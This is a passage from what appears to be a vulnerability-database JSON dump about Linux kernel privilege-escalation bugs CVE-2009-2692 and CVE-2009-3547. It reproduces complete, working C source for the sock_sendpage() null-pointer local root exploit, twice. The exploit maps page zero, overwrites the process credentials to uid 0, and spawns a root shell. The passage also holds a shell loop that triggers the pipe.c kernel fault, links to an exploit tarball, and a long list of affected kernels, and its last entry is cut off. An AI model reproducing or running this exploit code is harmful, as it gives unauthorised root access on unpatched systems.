Frasunek <venglin(at)czuby(dot)pl>.\r\n** --\r\n** exploit by <p0c73n1(at)gmail(dot)com>.\r\n**\r\n** "Slow and dirty exploit for this one"\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <sys/personality.h>\r\n\r\nunsigned int uid, gid;\r\n\r\nvoid kernel_code()\r\n{\r\n\tunsigned long where=0;\r\n\tunsigned long *pcb_task_struct;\r\n\r\n\twhere=(unsigned long )&where;\r\n\twhere&=~8191;\r\n\tpcb_task_struct=(unsigned long *)where;\r\n\r\n\twhile(pcb_task_struct){\r\n\t\tif(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&\r\n\t\t\tpcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&\r\n\t\t\tpcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&\r\n\t\t\tpcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){\r\n\t\t\tpcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;\r\n\t\t\tpcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tpcb_task_struct++;\r\n\t}\r\n\treturn;\r\n\t/*\r\n\t** By calling iret after pushing a register into kernel stack,\r\n\t** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}\r\n\t**\r\n\t** kernel_code() function will return to its previous status which means before sendfile() system call,\r\n\t** after operating upon a ring0(kernel mode) privilege level.\r\n\t** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.\r\n\t*/\r\n}\r\nvoid *kernel=kernel_code;\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tint fd_in=0,fd_out=0,offset=1;\r\n\tvoid *zero_page;\r\n\r\n\tuid=getuid();\r\n\tgid=getgid();\r\n\tif(uid==0){\r\n\t\tfprintf(stderr,"[-] check ur uid\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/*\r\n\t** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)\r\n\t*/\r\n\tif(personality(0xffffffff)==PER_SVR4){\r\n\t\tif(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){\r\n\t\t\tperror("[-] mprotect()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\n\telse if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){\r\n\t\t\tperror("[-] mmap()");\r\n\t\t\treturn -1;\r\n\t}\r\n\t*(char *)0x00000000=0xff;\r\n\t*(char *)0x00000001=0x25;\r\n\t*(unsigned long *)0x00000002=(unsigned long)&kernel;\r\n\t*(char *)0x00000006=0xc3;\r\n\r\n\tif((fd_in=open(argv[0],O_RDONLY))==-1){\r\n\t\tperror("[-] open()");\r\n\t\treturn -1;\r\n\t}\r\n\tif((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){\r\n\t\tif((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){\r\n\t\t\tperror("[-] socket()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\ngogossing:\r\n\t/*\r\n\t** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,\r\n\t** an attacker can make all the processes runing under current user uid 0.\r\n\t*/\r\n\tif(sendfile(fd_out,fd_in,&offset,2)==-1){\r\n\t\tif(offset==0){\r\n\t\t\tperror("[-] sendfile()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t\tclose(fd_out);\r\n\t\tfd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);\r\n\t}\r\n\tif(getuid()==uid){\r\n\t\tif(offset){\r\n\t\t\toffset=0;\r\n\t\t}\r\n\t\tgoto gogossing; /* all process */\r\n\t}\r\n\tclose(fd_in);\r\n\tclose(fd_out);\r\n\r\n\texecl("/bin/sh","sh","-i",NULL);\r\n\treturn 0;\r\n}\r\n\r\n/* eoc */\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12103", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:30:42", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66827", "id": "SSV:66827", "sourceData": "\n Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.\r\n\r\norig: http://zenthought.org/content/file/android-root-2009-08-16-source\r\nback: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz\r\n\r\n# milw0rm.com [2009-08-18]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66827", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:43:25", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66828", "id": "SSV:66828", "sourceData": "\n /*\r\n**\r\n** 0x82-CVE-2009-2692\r\n** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)\r\n** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.\r\n**\r\n** --\r\n** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.\r\n** spender and venglin's code is very excellent.\r\n** Thankful to them.\r\n**\r\n** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,\r\n** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.\r\n** --\r\n** exploit by <p0c73n1(at)gmail(dot)com>.\r\n**\r\n** "Slow and dirty exploit for this one"\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <sys/personality.h>\r\n\r\nunsigned int uid, gid;\r\n\r\nvoid kernel_code()\r\n{\r\n\tunsigned long where=0;\r\n\tunsigned long *pcb_task_struct;\r\n\r\n\twhere=(unsigned long )&where;\r\n\twhere&=~8191;\r\n\tpcb_task_struct=(unsigned long *)where;\r\n\r\n\twhile(pcb_task_struct){\r\n\t\tif(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&\r\n\t\t\tpcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&\r\n\t\t\tpcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&\r\n\t\t\tpcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){\r\n\t\t\tpcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;\r\n\t\t\tpcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tpcb_task_struct++;\r\n\t}\r\n\treturn;\r\n\t/*\r\n\t** By calling iret after pushing a register into kernel stack,\r\n\t** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}\r\n\t**\r\n\t** kernel_code() function will return to its previous status which means before sendfile() system call,\r\n\t** after operating upon a ring0(kernel mode) privilege level.\r\n\t** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.\r\n\t*/\r\n}\r\nvoid *kernel=kernel_code;\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tint fd_in=0,fd_out=0,offset=1;\r\n\tvoid *zero_page;\r\n\r\n\tuid=getuid();\r\n\tgid=getgid();\r\n\tif(uid==0){\r\n\t\tfprintf(stderr,"[-] check ur uid\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/*\r\n\t** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)\r\n\t*/\r\n\tif(personality(0xffffffff)==PER_SVR4){\r\n\t\tif(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){\r\n\t\t\tperror("[-] mprotect()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\n\telse if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){\r\n\t\t\tperror("[-] mmap()");\r\n\t\t\treturn -1;\r\n\t}\r\n\t*(char *)0x00000000=0xff;\r\n\t*(char *)0x00000001=0x25;\r\n\t*(unsigned long *)0x00000002=(unsigned long)&kernel;\r\n\t*(char *)0x00000006=0xc3;\r\n\r\n\tif((fd_in=open(argv[0],O_RDONLY))==-1){\r\n\t\tperror("[-] open()");\r\n\t\treturn -1;\r\n\t}\r\n\tif((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){\r\n\t\tif((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){\r\n\t\t\tperror("[-] socket()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\ngogossing:\r\n\t/*\r\n\t** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,\r\n\t** an attacker can make all the processes runing under current user uid 0.\r\n\t*/\r\n\tif(sendfile(fd_out,fd_in,&offset,2)==-1){\r\n\t\tif(offset==0){\r\n\t\t\tperror("[-] sendfile()");\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t\tclose(fd_out);\r\n\t\tfd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);\r\n\t}\r\n\tif(getuid()==uid){\r\n\t\tif(offset){\r\n\t\t\toffset=0;\r\n\t\t}\r\n\t\tgoto gogossing; /* all process */\r\n\t}\r\n\tclose(fd_in);\r\n\tclose(fd_out);\r\n\r\n\texecl("/bin/sh","sh","-i",NULL);\r\n\treturn 0;\r\n}\r\n\r\n/* eoc */\r\n\r\n// milw0rm.com [2009-08-24]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66828", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:31:27", "description": "Bugraq ID: 36901\r\nCVE ID\uff1aCVE-2009-3547\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux Kernel 'pipe.c'\u5b58\u5728\u4e00\u4e2aNull\u6307\u9488\u5f15\u7528\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\r\npipe_rdwr_open()\u4f1a\u89e6\u53d1Null\u6307\u9488\u5f02\u5e38\u751f\u6210\u5982\u4e0b\u5806\u6808\u8ddf\u8e2a\uff1a\r\n> Unable to handle kernel NULL pointer dereference at 0000000000000028 RIP:\r\n> [<ffffffff802899a5>] pipe_rdwr_open+0x35/0x70\r\n> [<ffffffff8028125c>] __dentry_open+0x13c/0x230\r\n> [<ffffffff8028143d>] do_filp_open+0x2d/0x40\r\n> [<ffffffff802814aa>] do_sys_open+0x5a/0x100\r\n> [<ffffffff8021faf3>] sysenter_do_call+0x1b/0x67\r\n\u901a\u8fc7/proc/pid/fd/*\u6253\u5f00\u533f\u540d\u7ba1\u9053\u53ef\u89e6\u53d1\u6b64\u5931\u8d25\u6a21\u5f0f\uff0c\u53ef\u901a\u8fc7\u5982\u4e0b\u811a\u672c\u4f8b\u8bc1\uff1a\r\n=============================================================\r\nwhile : ; do\r\n { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &\r\n PID=$!\r\n OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |\r\n { read PID REST ; echo $PID; } )\r\n OUT="${OUT%% *}"\r\n DELAY=$((RANDOM * 1000 / 32768))\r\n usleep $((DELAY * 1000 + RANDOM % 1000 ))\r\n echo n > /proc/$OUT/fd/1 # Trigger defect\r\ndone\r\n=============================================================\r\n\u6ce8\u610f\u8fd9\u4e2a\u5931\u8d25\u7a97\u53e3\u5f88\u5c0f\uff0c\u8981\u7a33\u5b9a\u91cd\u65b0\u8fd9\u4e2a\u7f3a\u9677\u9700\u8981\u5728pipe_rdwr_open()\u4e2d\u63d2\u5165\u5c11\u91cf\u5ef6\u8fdf:\r\n static int\r\n pipe_rdwr_open(struct inode *inode, struct file *filp)\r\n {\r\n msleep(100);\r\n mutex_lock(&inode->i_mutex)\r\n \r\n\u867d\u7136\u8fd9\u4e2a\u7f3a\u9677\u53d1\u73b0\u4e8epipe_rdwr_open()\u51fd\u6570\u4e2d\uff0c\u4f46\u5176\u4ed6pipe_*_open()\u51fd\u6570\u4e5f\u5e94\u8be5\u5b58\u5728\u6b64\u6f0f\u6d1e\u3002\r\n\u8865\u4e01\u4f1a\u5bf9\u5c1d\u8bd5\u64cd\u4f5cinode->i_pipe\u4e4b\u524d\uff0c\u5bf9inode->i_pipe\u662f\u5426\u91ca\u653e\u8fdb\u884c\u68c0\u67e5\uff0c\u5982\u679cinode->i_pipe\u4e0d\u5b58\u5728\u4e86\uff0c\u5c06\u8fd4\u56deENOENT\u8fdb\u884c\u63d0\u793a\u3002\n\nRedHat Enterprise MRG v1 for Red Hat Enterprise Linux version 5\r\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux WS 3\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux ES 3\r\nRedHat Enterprise Linux Desktop 5 client\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux AS 3\r\nRedHat Enterprise Linux Desktop version 4\r\nRedHat Enterprise Linux 5 server\r\nRedHat Desktop 3.0 \r\nLinux kernel 2.6.31 5\r\nLinux kernel 2.6.31 .2\r\nLinux kernel 2.6.31 -rc7\r\nLinux kernel 2.6.31 -rc6\r\nLinux kernel 2.6.31 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.31 -rc1\r\nLinux kernel 2.6.31 \r\nLinux kernel 2.6.30 rc6\r\nLinux kernel 2.6.30 1\r\nLinux kernel 2.6.30 -rc5\r\nLinux kernel 2.6.30 -rc3\r\nLinux kernel 2.6.30 -rc2\r\nLinux kernel 2.6.30 -rc1\r\nLinux kernel 2.6.30 \r\nLinux kernel 2.6.29 4\r\nLinux kernel 2.6.29 1\r\nLinux kernel 2.6.29 -git8\r\nLinux kernel 2.6.29 -git14\r\nLinux kernel 2.6.29 -git1\r\nLinux kernel 2.6.29 \r\nLinux kernel 2.6.28 9\r\nLinux kernel 2.6.28 8\r\nLinux kernel 2.6.28 6\r\nLinux kernel 2.6.28 5\r\nLinux kernel 2.6.28 3\r\nLinux kernel 2.6.28 2\r\nLinux kernel 2.6.28 1\r\nLinux kernel 2.6.28 -rc7\r\nLinux kernel 2.6.28 -rc5\r\nLinux kernel 2.6.28 -rc1\r\nLinux kernel 2.6.28 -git7\r\nLinux kernel 2.6.28 \r\nLinux kernel 2.6.27 6\r\nLinux kernel 2.6.27 3\r\nLinux kernel 2.6.27 24\r\nLinux kernel 2.6.27 14\r\nLinux kernel 2.6.27 13\r\nLinux kernel 2.6.27 12\r\nLinux kernel 2.6.27 12\r\nLinux kernel 2.6.27 .8\r\nLinux kernel 2.6.27 .5\r\nLinux kernel 2.6.27 .5\r\nLinux kernel 2.6.27 -rc8-git5\r\nLinux kernel 2.6.27 -rc8\r\nLinux kernel 2.6.27 -rc6-git6\r\nLinux kernel 2.6.27 -rc6\r\nLinux kernel 2.6.27 -rc5\r\nLinux kernel 2.6.27 -rc2\r\nLinux kernel 2.6.27 -rc1\r\nLinux kernel 2.6.27 \r\nLinux kernel 2.6.26 7\r\nLinux kernel 2.6.26 4\r\nLinux kernel 2.6.26 3\r\nLinux kernel 2.6.26 .6\r\nLinux kernel 2.6.26 -rc6\r\nLinux kernel 2.6.26 \r\nLinux kernel 2.6.25 19\r\nLinux kernel 2.6.25 .9\r\nLinux kernel 2.6.25 .8\r\nLinux kernel 2.6.25 .7\r\nLinux kernel 2.6.25 .6\r\nLinux kernel 2.6.25 .5\r\nLinux kernel 2.6.25 .15\r\nLinux kernel 2.6.25 .13\r\nLinux kernel 2.6.25 .12\r\nLinux kernel 2.6.25 .11\r\nLinux kernel 2.6.25 .10\r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.24 .2\r\nLinux kernel 2.6.24 .1\r\nLinux kernel 2.6.24 -rc5\r\nLinux kernel 2.6.24 -rc4\r\nLinux kernel 2.6.24 -rc3\r\nLinux kernel 2.6.24 -git13\r\nLinux kernel 2.6.24 \r\nLinux kernel 2.6.23 .7\r\nLinux kernel 2.6.23 .6\r\nLinux kernel 2.6.23 .5\r\nLinux kernel 2.6.23 .4\r\nLinux kernel 2.6.23 .3\r\nLinux kernel 2.6.23 .2\r\nLinux kernel 2.6.23 -rc2\r\nLinux kernel 2.6.23 -rc1\r\nLinux kernel 2.6.23 \r\nLinux kernel 2.6.22 7\r\nLinux kernel 2.6.22 1\r\nLinux kernel 2.6.22 .8\r\nLinux kernel 2.6.22 .6\r\nLinux kernel 2.6.22 .5\r\nLinux kernel 2.6.22 .4\r\nLinux kernel 2.6.22 .3\r\nLinux kernel 2.6.22 .17\r\nLinux kernel 2.6.22 .16\r\nLinux kernel 2.6.22 .15\r\nLinux kernel 2.6.22 .14\r\nLinux kernel 2.6.22 .13\r\nLinux kernel 2.6.22 .12\r\nLinux kernel 2.6.22 .11\r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20 -git5\r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18 \r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13 \r\nLinux kernel 2.6.13 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.9 \r\nLinux kernel 2.6.8 rc3\r\nLinux kernel 2.6.8 rc2\r\nLinux kernel 2.6.8 rc1\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.8 \r\nLinux kernel 2.6.7 rc1\r\nLinux kernel 2.6.7 \r\nLinux kernel 2.6.6 rc1\r\nLinux kernel 2.6.6 \r\nLinux kernel 2.6.5 \r\nLinux kernel 2.6.4 \r\nLinux kernel 2.6.3 \r\nLinux kernel 2.6.2 \r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1 \r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6 \r\nLinux kernel 2.6.8.1\r\n+ S.u.S.E. Linux Personal 9.2 x86_64\r\n+ S.u.S.E. Linux Personal 9.2 \r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.32-rc5\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.32-rc4\r\nLinux kernel 2.6.32-rc3\r\nLinux kernel 2.6.32-rc2\r\nLinux kernel 2.6.32-rc1\r\nLinux kernel 2.6.31.4\r\nLinux kernel 2.6.31.2\r\nLinux kernel 2.6.31-rc9\r\nLinux kernel 2.6.31-rc8\r\nLinux kernel 2.6.31-rc7\r\nLinux kernel 2.6.31-rc5-git3\r\nLinux kernel 2.6.31-rc2\r\nLinux kernel 2.6.31-git11\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.30.5\r\nLinux kernel 2.6.30.4\r\nLinux kernel 2.6.30.3\r\nLinux kernel 2.6.29-rc2-git1\r\nLinux kernel 2.6.29-rc2\r\nLinux kernel 2.6.29-rc1\r\nLinux kernel 2.6.28.4\r\nLinux kernel 2.6.26.1\r\nLinux kernel 2.6.26-rc5-git1\r\nLinux kernel 2.6.25.4\r\nLinux kernel 2.6.25.3\r\nLinux kernel 2.6.25.2\r\nLinux kernel 2.6.25.1\r\nLinux kernel 2.6.25-rc1\r\nLinux kernel 2.6.24.6\r\nLinux kernel 2.6.24-rc2\r\nLinux kernel 2.6.24-rc1\r\nLinux kernel 2.6.23.14\r\nLinux kernel 2.6.23.10\r\nLinux kernel 2.6.23.1\r\nLinux kernel 2.6.23.09\r\nLinux kernel 2.6.22-rc7\r\nLinux kernel 2.6.22-rc1\r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.19 -rc6\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u8865\u4e01\u7a0b\u5e8f\uff1a\r\nhttp://lkml.org/lkml/2009/10/21/42", "cvss3": {}, "published": "2009-11-05T00:00:00", "type": "seebug", "title": "Linux\u5185\u6838'pipe.c'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3547"], "modified": "2009-11-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12576", "id": "SSV:12576", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:31:49", "description": "No description provided by source.", "cvss3": {}, "published": "2009-11-08T00:00:00", "title": "Linux 2.6.x fs/pipe.c local root exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3547"], "modified": "2009-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12593", "id": "SSV:12593", "sourceData": "\n For those who were not yet aware, there is at least 3 public exploits \r\nsince 11/05/2009 for CVE-2009-3547 targeting *all* linux kernels from \r\n2.6.0 to 2.6.31 included. Since spender and fotis have already release \r\ntheir own, there is not need for us to keep this on our hd. \r\nImpelDown.c is a poc trying to exploit null ptr dereference in fs/pipe.c \r\nfor *all* linux kernel from 2.6.0 to 2.6.31 and ImpelDown-2.6.31only.c \r\ntarget only linux kernel version 2.6.31 (tested and approuved with \r\nmmap_min_addr at 0). \r\nIf you were writing your own, you have already noticed that there is a \r\nsubtle difference in the way you can own kernels 